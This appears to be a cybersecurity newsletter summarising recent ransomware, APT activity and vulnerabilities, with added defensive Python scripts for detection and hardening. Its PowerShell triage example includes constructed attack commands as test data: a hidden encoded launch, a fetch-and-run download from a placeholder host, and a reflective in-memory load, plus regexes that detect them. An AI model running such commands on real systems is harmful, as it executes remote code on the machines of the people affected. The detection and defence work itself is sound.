City Hall HACKED: North Miami’s Ransomware Fiasco and Data Breach

Hi, my fellow malware enthusiast,
Did the same thing happen to you? Were you able to afford the trip, the ticket, the event…? I could not… I really wanted to be there, but I couldn’t… Yes, I’m talking about Black Hat! I mean, it’s one of the biggest cybersecurity conferences, and it’s a good opportunity to network and meet new people. You know what? Let’s make a bet! Next year I will try to be at either Black Hat or Defcon, or both! Maybe we’ll meet each other over there, who knows?
Well, there’s my introduction 😂! Now that we’ve got that out of the way, enjoy this week's newsletter!
KageNoHitobito: The Ransomware Lurking in the Shadows
Threat Actors Hijack Legitimate Anti-Virus Software with SbaProxy Tool
GhostWrite: A Critical Flaw in Alibaba's T-Head RISC-V Processors
“0.0.0.0 Day”: How Attackers Exploit Browser Flaws for RCE
Shadow Resources Exposed: Critical AWS Flaws Revealed
Kaspersky's Q2 2024 APT Summary: Key Findings
Analyzing BeaverTail Malware: Insights and Protection Strategies
Snake Keylogger: An In-Depth Technical Analysis
KageNoHitobito: The Ransomware Lurking in the Shadows

In late March 2024, a new ransomware family called KageNoHitobito emerged and caught the attention of security researchers. It encrypts files on infected machines and leaves ransom notes demanding payment for their release. Victims are told to contact the operators over the TOR network, which keeps the group anonymous, but the group runs no public leak site. That absence suggests they are not running a double-extortion scheme, though a missing leak site is not proof that no data was taken.
💡Operating through the TOR network is really a good idea to maintain anonymity, but wait, I’m not advocating for it
What makes KageNoHitobito awkward to handle is its evasion: it uses anti-analysis techniques intended to sidestep security tools and hinder researchers. For persistence, it modifies the system registry so that it runs again after a reboot. Notably, it only encrypts files on the infected machine’s local drives and leaves network shares untouched, so the blast radius of a single infection is the host itself rather than every share the user can reach. Encrypted files carry the “.hitobito” extension, which is the quickest indicator that this family has run.
👉For more details, check out this blog.
The Israeli hacktivist group WeRedEvils has claimed responsibility for a major internet outage in Iran. They claim to have breached Iranian systems, stolen data, and disrupted key government websites, following their reported attack on Iran’s electricity grid in October 2023. Iranian government sites were down at the time of writing, though the full impact and WeRedEvils' actual role remain uncertain.
Threat Actors Hijack Legitimate Anti-Virus Software with SbaProxy Tool

LevelBlue Labs has uncovered a campaign in which threat actors repurpose legitimate anti-virus software to carry out malicious activity undetected. The tool, named SbaProxy, is built from modified anti-virus binaries and passes itself off as genuine anti-virus components, which makes it hard to spot. Distributed as DLLs, EXEs, and PowerShell scripts, SbaProxy establishes proxy connections through a command and control (C&C) server so the operators can route traffic through the victim stealthily.
What is alarming is that the modified binaries carry valid code-signing certificates, so controls that trust a valid signature let SbaProxy through. Practically, this means a signature check alone is not enough: defenders need to compare file hashes against the vendor’s known-good releases and watch for anti-virus components making unexpected outbound proxy connections. The tool not only facilitates the operators’ own activity but could also be sold to other actors, widening its impact.
👉Check out the blog to get a more technical overview.
North Miami's Mayor Alix Desulme revealed that his personal Gmail account was hacked, and the compromise led to a ransomware attack that affected city operations. While the city has partially recovered, online services remain down, and residents have to handle payments in person. The breach potentially exposed sensitive personal information even though it did not target city systems directly. Residents are concerned about both the ongoing service disruption and the security of their personal data.
GhostWrite: A Critical Flaw in Alibaba's T-Head RISC-V Processors

Researchers at Germany's CISPA Helmholtz Center for Information Security have uncovered a severe vulnerability in Alibaba subsidiary T-Head Semiconductor's RISC-V processors. Dubbed GhostWrite, this flaw impacts the T-Head C910 CPU cores within the TH1520 SoC and allows rogue applications or users to gain unauthorized access to physical memory. This enables them to execute arbitrary code with the highest system privileges, effectively taking full control of the affected device.
💡Honestly, I don’t know about you, but I really want to get into hardware exploitation, but I’m not at that level yet😂
The vulnerability arises from vector extension instructions that, because of a hardware bug, bypass the CPU’s memory protection and operate on physical memory directly, so the MMU’s isolation between processes and between user and kernel does not apply to them. Because the fault is in the silicon, no software or firmware update fixes it; the only mitigation is to disable the vector extension, which removes those instructions entirely and can severely degrade applications that rely on them. GhostWrite is therefore a serious risk for any system on these processors where untrusted, unprivileged code can run, such as virtual machines, containers, or multi-tenant hosts.
💡It’s really amazing how a single vulnerability can completely cripple a system. All my best thoughts to the creators, but I’m amazed!
To better understand and detect such vulnerabilities, the researchers developed a fuzzing framework called RISCVuzz. This tool was instrumental in discovering GhostWrite, as well as other architectural issues in T-Head's chips. The full details of their findings will be presented at the Black Hat security conference, highlighting the potential risks associated with custom implementations of open standards like RISC-V.
👉Want to know more? Dive into the blog for the full scoop!
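The write-up says the only mitigation is to turn off the vector extension, so the first thing a practitioner wants is a way to tell whether a given host is a C910 core with vector still enabled. The script below is an added example, not CISPA's RISCVuzz or any vendor tool: it parses the Linux /proc/cpuinfo format for RISC-V (the `isa` and `uarch` fields) and lists processors that match. The cpuinfo text is constructed for the example, and the `thead,c910` uarch spelling and the extension names in it are assumptions about what a given kernel prints, so confirm them against real hardware.

```python
"""Flag T-Head C910 cores that still expose a vector extension (GhostWrite candidates).

Added example; the cpuinfo text is constructed and the field contents are assumed.
Run with --live to read the real /proc/cpuinfo of the current machine.
"""
import re
import sys
from typing import Dict, List, Set, Tuple

CONSTRUCTED_CPUINFO = """\
processor\t: 0
hart\t\t: 0
isa\t\t: rv64imafdcv_zicsr_zifencei_xtheadvector
mmu\t\t: sv39
uarch\t\t: thead,c910

processor\t: 1
hart\t\t: 1
isa\t\t: rv64imafdcv_zicsr_zifencei_xtheadvector
mmu\t\t: sv39
uarch\t\t: thead,c910
"""


def parse_isa(isa: str) -> Tuple[str, Set[str], Set[str]]:
    """Split 'rv64imafdcv_zicsr_...' into (base, single-letter exts, multi-letter exts)."""
    m = re.fullmatch(r"(rv(?:32|64|128))([a-z]*)(?:_(.*))?", isa.strip().lower())
    if not m:
        raise ValueError(f"not a RISC-V ISA string: {isa!r}")
    base, letters, rest = m.group(1), set(m.group(2)), m.group(3) or ""
    if "g" in letters:                      # 'g' is shorthand for imafd (+zicsr, zifencei)
        letters |= set("imafd")
    multi = {ext for ext in rest.split("_") if ext}
    return base, letters, multi


def has_vector(isa: str) -> bool:
    """True if the full V extension, a Zve* subset, or T-Head's vector variant is enabled."""
    _, letters, multi = parse_isa(isa)
    return "v" in letters or any(e.startswith("zve") for e in multi) or "xtheadvector" in multi


def cpuinfo_blocks(text: str) -> List[Dict[str, str]]:
    """One dict per 'processor' stanza; stanzas are separated by blank lines."""
    blocks = []
    for stanza in re.split(r"\n\s*\n", text.strip()):
        fields = {}
        for line in stanza.splitlines():
            key, _, value = line.partition(":")
            fields[key.strip()] = value.strip()
        if fields:
            blocks.append(fields)
    return blocks


def ghostwrite_exposed(text: str) -> List[int]:
    """Processor numbers that are C910 cores with a vector extension still enabled."""
    exposed = []
    for fields in cpuinfo_blocks(text):
        try:
            vector = has_vector(fields.get("isa", ""))
        except ValueError:                  # block without a parsable isa line
            continue
        if "c910" in fields.get("uarch", "").lower() and vector:
            exposed.append(int(fields.get("processor", -1)))
    return exposed


if __name__ == "__main__":
    if "--live" in sys.argv:
        with open("/proc/cpuinfo") as fh:
            text = fh.read()
    else:
        text = CONSTRUCTED_CPUINFO
    hits = ghostwrite_exposed(text)
    print("exposed C910 cores:", hits if hits else "none")
```

The parser treats `g` as the usual `imafd` shorthand and accepts both the standard `v`/`zve*` names and the `xtheadvector` name used for T-Head's pre-ratification vector implementation, so a core with any of them is reported; a host where the kernel or firmware has disabled vector shows no `v`, `zve*` or `xtheadvector` in `isa` and comes back clean.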
Earth Baku, an advanced persistent threat (APT) group known since 2021, has broadened its reach to Europe, the Middle East, and Africa. Since late 2022 it has updated its attack methods, exploiting public-facing IIS servers to get into victims’ networks. Once inside, the group deploys tools such as StealthVector, StealthReacher, and the new SneakCross backdoor. Its targets span government, telecom, healthcare, and more, with possible activity in countries like Italy, the UAE, and Romania. The group is suspected of using MEGAcmd for data exfiltration, making it a significant threat across multiple sectors.
“0.0.0.0 Day”: How Attackers Exploit Browser Flaws for Remote Code Execution

Oligo Security's latest discovery, "0.0.0.0 Day," reveals a flaw shared by the major web browsers that lets an external website reach services listening on the visitor’s own machine. It affects Chromium, Firefox, and Safari on macOS and Linux (Windows blocks 0.0.0.0 at the operating-system level), and it works because browsers did not treat the address 0.0.0.0 as local or private even though the operating system delivers a connection to it to the local host. Any local service with an unauthenticated API that executes code thereby becomes reachable for remote code execution from a web page. The issue highlights a long-standing gap in browser security and standardization.
Key Points:
Vulnerability Overview: The issue arises from inconsistent security mechanisms across browsers, none of which standardized how requests to local network interfaces should be treated. An attacker exploits this by having the victim’s browser send requests to local services on the attacker’s behalf.
Attack Vector: The malicious page sends ordinary HTTP requests to http://0.0.0.0:<port>/..., which land on whatever is bound to that port on the visitor’s machine and, by extension, on internal network services. Depending on the service, this can lead to data theft, malware deployment, or full control over the local service.
Technical Details: Browsers’ handling of HTTP requests to local or internal addresses has lacked consistent controls. CORS only prevents the page from reading the response; a `no-cors` POST is still sent, so a local API that acts on the request body has already been exploited by the time CORS blocks anything. The newer Private Network Access (PNA) standard was meant to stop such requests with a preflight, but 0.0.0.0 was not among the addresses it treated as private, so requests to it slipped through.
Proof of Concept: The researchers reused the ShadowRay attack (an unauthenticated code-execution API in the Ray framework) through the 0.0.0.0 vector, showing that a single HTTP request from a web page can execute arbitrary code on a Ray instance running on the visitor’s machine.
Mitigation: Google, Apple, and Mozilla are working on fixes; Chromium announced a gradual block of 0.0.0.0 beginning with version 128, WebKit blocked the address, and Firefox had not shipped a fix at the time of disclosure. For immediate protection, developers and administrators of local services should:
Answer PNA preflights and validate the Host header against an allow-list of expected names, which also defends against DNS rebinding.
Use HTTPS rather than HTTP and require CSRF tokens in local applications.
Apply at least minimal authorization even to services that only listen on localhost, since “local” no longer means “only reachable by the user.”
👉Want to know more? You can read the blog about it!
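The mitigation list above is server side, so here is what it looks like in the service itself. The function below is an added example (not Oligo’s code, and not tied to Ray or any other project): a request gate that a loopback-bound HTTP service runs before its handler, enforcing a Host allow-list (which drops the `Host: 0.0.0.0:port` the browser sends on the 0.0.0.0 path and the foreign name a DNS-rebinding attack sends), the Private Network Access preflight, an origin check for browsers that have no PNA, and a CSRF token on state-changing methods. The allowed hosts, the trusted front-end origin and the token value are assumptions for the example.

```python
"""Request gate for a service listening on loopback (added example, not Oligo's code)."""
from dataclasses import dataclass, field
from hmac import compare_digest
from typing import Optional

# Authorities a first-party client legitimately uses. "0.0.0.0" is absent on purpose:
# a request whose Host is 0.0.0.0 came through the 0.0.0.0 Day path, and an unknown
# hostname is the DNS-rebinding path. Assumed values.
ALLOWED_HOSTS = {"localhost", "127.0.0.1", "[::1]"}
# Web origins allowed to call the API at all (assumed front-end origin).
TRUSTED_ORIGINS = {"http://localhost:3000"}
STATE_CHANGING = {"POST", "PUT", "PATCH", "DELETE"}


@dataclass
class Decision:
    status: int
    reason: str
    response_headers: dict = field(default_factory=dict)

    @property
    def allowed(self) -> bool:
        return self.status < 400


def host_name(host_header: str) -> str:
    """Drop the port from a Host value; an IPv6 literal keeps its brackets."""
    value = host_header.strip().lower()
    if value.startswith("["):
        return value.split("]", 1)[0] + "]"
    return value.split(":", 1)[0]


def gate(method: str, headers: dict, expected_csrf: Optional[str] = None) -> Decision:
    """Decide whether a request may reach the handler; header names are case-insensitive."""
    method = method.upper()
    hdr = {k.lower(): v for k, v in headers.items()}

    # 1. The browser copies the URL authority into Host, so 0.0.0.0:port shows up here.
    host = host_name(hdr.get("host", ""))
    if host not in ALLOWED_HOSTS:
        return Decision(421, f"unexpected Host {host!r}")

    origin = hdr.get("origin")

    # 2. PNA preflight: a public page asking for a private-network target must name a
    #    trusted Origin, otherwise the browser never sends the real request.
    pna = hdr.get("access-control-request-private-network", "").lower() == "true"
    if method == "OPTIONS" and pna:
        if origin in TRUSTED_ORIGINS:
            return Decision(204, "private-network preflight approved", {
                "Access-Control-Allow-Origin": origin,
                "Access-Control-Allow-Private-Network": "true",
                "Vary": "Origin",
            })
        return Decision(403, f"private-network access denied for origin {origin!r}")

    # 3. Browsers without PNA still send the request (CORS only hides the response),
    #    so reject foreign origins and Sec-Fetch-Site: cross-site ourselves.
    if origin is not None and origin not in TRUSTED_ORIGINS:
        return Decision(403, f"cross-origin request from {origin!r}")
    if hdr.get("sec-fetch-site", "").lower() == "cross-site":
        return Decision(403, "cross-site request flagged by Sec-Fetch-Site")

    # 4. Even a request that looks first-party must carry the CSRF token to write.
    if method in STATE_CHANGING:
        token = hdr.get("x-csrf-token", "")
        if not expected_csrf or not compare_digest(token.encode(), expected_csrf.encode()):
            return Decision(403, "missing or invalid CSRF token")

    return Decision(200, "ok")


if __name__ == "__main__":
    # What a hostile page's fetch("http://0.0.0.0:8000/api/jobs", {method: "POST",
    # mode: "no-cors"}) looks like on arrival (constructed headers).
    hostile = {"Host": "0.0.0.0:8000", "Origin": "https://attacker.example",
               "Sec-Fetch-Site": "cross-site"}
    print(gate("POST", hostile))
    print(gate("POST", {"Host": "127.0.0.1:8000", "X-CSRF-Token": "t0k"}, expected_csrf="t0k"))
```

The Host check alone already stops the 0.0.0.0 trick and DNS rebinding, because the attacker cannot make the browser send `Host: localhost` for a URL that does not say so; the remaining checks cover the case where the attacker finds another route to a permitted Host, which is why the CSRF token is required on every write regardless of origin.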
Shadow Resources Exposed: Critical AWS Flaws Revealed

Aqua Security researchers disclosed six critical vulnerabilities in AWS services at Black Hat USA 2024. The attack class, dubbed "shadow resources," affects services including AWS CloudFormation, CodeStar, and Service Catalog, and the flaws could lead to full account takeover and data breaches. AWS fixed the affected services before disclosure, but the same pattern can recur in any service or tool that creates resources with predictable names on a user’s behalf.
Key Findings
Shadow Resources: When a user uploads a template, CloudFormation automatically creates an S3 bucket to hold it, and the bucket name follows a predictable pattern built from a per-account identifier and the region. Because the identifier is the same in every region, an attacker who learns it can create those buckets in regions the victim has not used yet, before AWS does.
Bucket Monopoly: S3 bucket names are global, so the service cannot create a bucket whose name already exists. It instead writes into the attacker-owned bucket of that name, and data meant for the legitimate bucket flows to the attacker.
Exploitation Techniques: In the attacker’s bucket, an AWS Lambda function triggered on object creation rewrites the uploaded CloudFormation template, for example by inserting an IAM role with administrative permissions. When the victim deploys the stack, the modified template runs in the victim’s account.
These findings highlight a new class of attack vector. The practical countermeasures are to condition IAM permissions on aws:ResourceAccount so a role cannot read or write a bucket owned by another account, to verify bucket ownership before writing, and to avoid predictable names for resources your own tooling creates.
👉For additional intel on it, read here.
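To make the defender’s side concrete, the following is an added example (not Aqua’s research code and not an AWS API): it enumerates the bucket names an attacker would squat once the per-account identifier leaks, builds the IAM statement that refuses to touch buckets another account owns, and wraps the S3 write in an ownership check. The `cf-templates-<id>-<region>` naming form, the 12-character identifier, and the account IDs are assumptions, and the S3 client is a constructed stand-in so the file runs offline; with boto3 the same calls take the same `ExpectedBucketOwner` keyword and raise `botocore.exceptions.ClientError` instead of the stand-in’s exception.

```python
"""Bucket Monopoly, defender's side (added example with a stand-in S3 client)."""
from typing import Iterable, List

ACCOUNT_ID = "111111111111"            # constructed
TEMPLATE_BUCKET_ID = "a1b2c3d4e5f6"    # constructed; the real id is specific to an account
REGIONS = ["us-east-1", "eu-west-3", "ap-southeast-2"]


def cloudformation_bucket_names(bucket_id: str, regions: Iterable[str]) -> List[str]:
    """Every name CloudFormation would pick for this account, one per region.
    The id does not change per region, so one leak lets an attacker pre-create the
    buckets in regions the victim has not deployed to yet."""
    return [f"cf-templates-{bucket_id}-{region}" for region in regions]


def resource_account_guard(account_id: str) -> dict:
    """IAM statement: deny S3 reads/writes unless the bucket belongs to account_id.
    aws:ResourceAccount resolves to the account that owns the target resource, so a
    squatted bucket living in the attacker's account fails the condition."""
    return {
        "Sid": "DenyForeignBuckets",
        "Effect": "Deny",
        "Action": ["s3:GetObject", "s3:PutObject"],
        "Resource": "arn:aws:s3:::*/*",
        "Condition": {"StringNotEquals": {"aws:ResourceAccount": account_id}},
    }


class OwnerMismatch(Exception):
    """Raised by the stand-in when the bucket is owned by someone else (boto3: ClientError 403)."""


class FakeS3:
    """Stand-in for boto3's S3 client: head_bucket/put_object with ExpectedBucketOwner only."""

    def __init__(self, owners: dict):
        self.owners = owners          # bucket name -> owning account id (constructed)
        self.objects = {}

    def head_bucket(self, Bucket, ExpectedBucketOwner):
        if self.owners.get(Bucket) != ExpectedBucketOwner:
            raise OwnerMismatch(Bucket)

    def put_object(self, Bucket, Key, Body, ExpectedBucketOwner):
        self.head_bucket(Bucket, ExpectedBucketOwner)
        self.objects[(Bucket, Key)] = Body


OWNER_ERRORS = (OwnerMismatch,)   # add botocore.exceptions.ClientError for the real client


def safe_put_template(client, bucket: str, key: str, body: bytes, account_id: str) -> bool:
    """Write a template only after S3 confirms the bucket is ours; return False otherwise.
    Passing ExpectedBucketOwner turns a silent write into a foreign bucket into a 403."""
    try:
        client.head_bucket(Bucket=bucket, ExpectedBucketOwner=account_id)
        client.put_object(Bucket=bucket, Key=key, Body=body, ExpectedBucketOwner=account_id)
        return True
    except OWNER_ERRORS:
        return False


if __name__ == "__main__":
    names = cloudformation_bucket_names(TEMPLATE_BUCKET_ID, REGIONS)
    # Constructed world: the victim owns the us-east-1 bucket, an attacker pre-created
    # the eu-west-3 one, and nobody has created the ap-southeast-2 one yet.
    s3 = FakeS3({names[0]: ACCOUNT_ID, names[1]: "999999999999"})
    for name in names:
        ok = safe_put_template(s3, name, "stack.yaml", b"Resources: {}", ACCOUNT_ID)
        print(f"{name}: {'written' if ok else 'REFUSED'}")
```

The ownership check covers code you write; the IAM statement is what covers the AWS service acting on your behalf, since it is the service role, not your script, that CloudFormation uses to write the template, and a Deny with `aws:ResourceAccount` applies to that role too.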
Seqrite Labs recently uncovered multiple global campaigns using fake PayPal receipt documents to deliver a new variant of ransomware called Cronus. This PowerShell-based malware is particularly stealthy, executing directly in memory without leaving a trace on the disk. The attack begins with a malicious document named paypal_charges.doc, which contains VBA macros designed to download a secondary PowerShell loader. This loader then employs reflective DLL loading to deploy the ransomware, a technique previously seen in attacks by groups like NETWALKER. The use of these advanced tactics highlights the increasing sophistication of ransomware campaigns. For a technical analysis on it, read more here.
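The delivery chain above (Office document with a macro, a PowerShell stage that fetches a second loader, and a loader that runs code from memory) is exactly what endpoint telemetry can catch even when nothing touches disk. The script below is an added example, not Seqrite’s analysis code: it runs three rules over constructed process-creation and PowerShell script-block events. The event shape and the sample commands are made up for the example and follow no particular EDR’s schema.

```python
"""Triage rules for the Cronus-style delivery chain (added example, constructed events)."""
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class Event:
    kind: str        # "process" (creation) or "scriptblock" (PowerShell 4104-style)
    parent: str      # parent image path, "" for scriptblock events
    image: str
    command: str


OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Command-line switches loaders use to hide; each PowerShell prefix form is accepted.
EVASIVE_FLAGS = [
    (re.compile(r"(?i)(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+\S"), "encoded command"),
    (re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"), "hidden window"),
    (re.compile(r"(?i)-e(?:p|xecutionpolicy)\s+bypass"), "execution policy bypass"),
    (re.compile(r"(?i)-nop(?:rofile)?\b"), "no profile"),
]
REMOTE_LOADER = re.compile(
    r"(?i)DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bIEX\b|Invoke-Expression")
IN_MEMORY = re.compile(
    r"(?i)\[System\.Reflection\.Assembly\]::Load\(|\[Reflection\.Assembly\]::Load\("
    r"|VirtualAlloc|Invoke-ReflectivePEInjection")

# Constructed telemetry, not samples from the Seqrite report.
EVENTS = [
    Event("process", r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
          r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          "powershell.exe -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    Event("scriptblock", "", "powershell.exe",
          "$s=(New-Object Net.WebClient).DownloadString('http://203.0.113.10/stage2.ps1');IEX $s"),
    Event("scriptblock", "", "powershell.exe",
          "$asm=[System.Reflection.Assembly]::Load($bytes);$asm.EntryPoint.Invoke($null,@())"),
    Event("process", r"C:\Windows\explorer.exe",
          r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          "powershell.exe -NoLogo -Command Get-Date"),
    Event("scriptblock", "", "powershell.exe", r"Get-ChildItem C:\Users"),
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def findings(e: Event) -> List[str]:
    """Rule labels that fire for one event, in a fixed order."""
    out = []
    if e.kind == "process":
        if basename(e.parent) in OFFICE and basename(e.image) in SCRIPT_HOSTS:
            out.append("office-spawned script host")
        for rx, label in EVASIVE_FLAGS:
            if rx.search(e.command):
                out.append(label)
    elif e.kind == "scriptblock":
        if REMOTE_LOADER.search(e.command):
            out.append("remote loader")
        if IN_MEMORY.search(e.command):
            out.append("in-memory (reflective) load")
    return out


def triage(events: List[Event]) -> List[Tuple[int, List[str]]]:
    """(event index, labels) for every event that trips at least one rule."""
    result = []
    for i, e in enumerate(events):
        labels = findings(e)
        if labels:
            result.append((i, labels))
    return result


if __name__ == "__main__":
    for index, labels in triage(EVENTS):
        print(f"event {index}: {', '.join(labels)}")
```

On its own, each rule is noisy (administrators do run `-NoProfile`, and plenty of legitimate scripts call `DownloadString`); the value is in the sequence, so in production you would correlate the three labels on the same host within a short window rather than alert on any single one.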
Kaspersky's Q2 2024 APT Summary: Key Findings

A critical Linux supply chain attack, tracked as CVE-2024-3094 with a CVSS score of 10.0, planted a backdoor in the liblzma library shipped with the XZ compression utility (versions 5.6.0 and 5.6.1). On distributions where sshd links liblzma through libsystemd, the backdoor hooked OpenSSH’s public-key authentication path so that an attacker holding the right key could execute commands remotely.
Significant developments include the ToddyCat APT group's upgraded PcExter 2.0 exfiltration tool and the CloudComputating group's new tools targeting ISPs in West Asia. The Gaza Cybergang has refined its tactics in the Middle East, while the Mysterious Elephant threat actor in Southeast Asia introduces new malware families.
Hacktivist groups -=Twelve=- and Homeland Justice are active in the Russian-Ukrainian conflict and Albanian targets, respectively. Other notable discoveries include the Aniseed Vodka Framework in East Africa, DinodasRAT's Linux variant, CloudSorcerer malware, and the Telemos Backdoor.
💡These APT groups never sleep😂
👉Want to know more? You can read about it here!
Analyzing BeaverTail Malware: Insights and Protection Strategies

In the aftermath of the August 7, 2024, security breach, Nexera Fundrs offers a detailed analysis of the BeaverTail malware involved in the attack. The breach began with attackers posing as consultants on LinkedIn, leading a staff member to a GitHub repository containing malicious code disguised as a game.
Upon execution, BeaverTail, JavaScript-based malware delivered inside Node Package Manager (NPM) packages, started a local web server and communicated with a command and control (C&C) server. It exfiltrated sensitive data, including browser credentials and cryptocurrency wallet details, and deployed a backdoor named InvisibleFerret to capture keystrokes and remotely control the infected machine.
While the attackers compromised wallet credentials, multi-factor authentication (MFA) and swift response measures mitigated further damage. Defensive strategies include verifying LinkedIn profiles, using updated anti-malware tools, isolating suspicious code in virtual machines, and enhancing account and wallet security with MFA and hardware wallets.
👉Want to know more? You can read about it here!
Cisco has revealed five significant vulnerabilities in its SPA 300 and SPA 500 IP phones, including three critical flaws and two high-severity issues. Here's what you need to know:
Critical Vulnerabilities (CVSS v3.1 Score: 9.8):
CVE-2024-20450, CVE-2024-20452, CVE-2024-20454: These buffer overflow vulnerabilities enable unauthenticated, remote attackers to send specially crafted HTTP requests that overflow internal buffers. This can grant them root-level access, allowing full control over the device's operating system.
High-Severity Vulnerabilities (CVSS v3.1 Score: 7.5):
CVE-2024-20451, CVE-2024-20453: These flaws result from insufficient checks on HTTP packets, which can lead to a denial of service (DoS) on the affected devices.
Cisco emphasizes that all five vulnerabilities affect every software release for the SPA 300 and SPA 500 IP phones, regardless of configuration, and that each flaw can be exploited independently. Because both product lines are end-of-life, Cisco has stated it will not release software fixes, so the realistic options are to replace the phones or to keep their web management interface off any network an attacker can reach.
For the full details, refer to Cisco's security bulletin.
Snake Keylogger: An In-Depth Technical Analysis

Snake Keylogger, a formidable credential stealer first detected in November 2020, is written in .NET and designed for covert operations. Distributed primarily through phishing campaigns that exploit document vulnerabilities, this malware can log keystrokes, steal saved credentials, capture screenshots, and harvest clipboard data. Its infection process often involves phishing emails with malicious Office documents or PDFs that, when opened, trigger the malware via PowerShell scripts.
💡Here we go again! Ding! Ding! Ding! We have a winner, Microsoft! Thank you for helping them fool us again… Just joking😂
Snake Keylogger is adept at evading detection, using encrypted channels for data exfiltration and deploying additional malicious components remotely. The analysis delves into its operation, distribution tactics, and embedded malicious content, offering strategies to detect, prevent, and mitigate its threat. Key mitigation strategies include user education on phishing risks, up-to-date anti-malware tools, vigilant network monitoring, and regular software patching to close vulnerabilities.
👉Want to know more? You can read about it here!
✉️ Wrapping Up
In the world of malware, understanding is key. As we delve into these threats together, remember that knowledge and vigilance are our best allies.
If you find this newsletter helpful and know others who might benefit from it, I'd be grateful if you could pass it along. 🙏
Until next time, stay informed and keep your defenses sharp. Here’s to staying one step ahead!
Thanks for reading!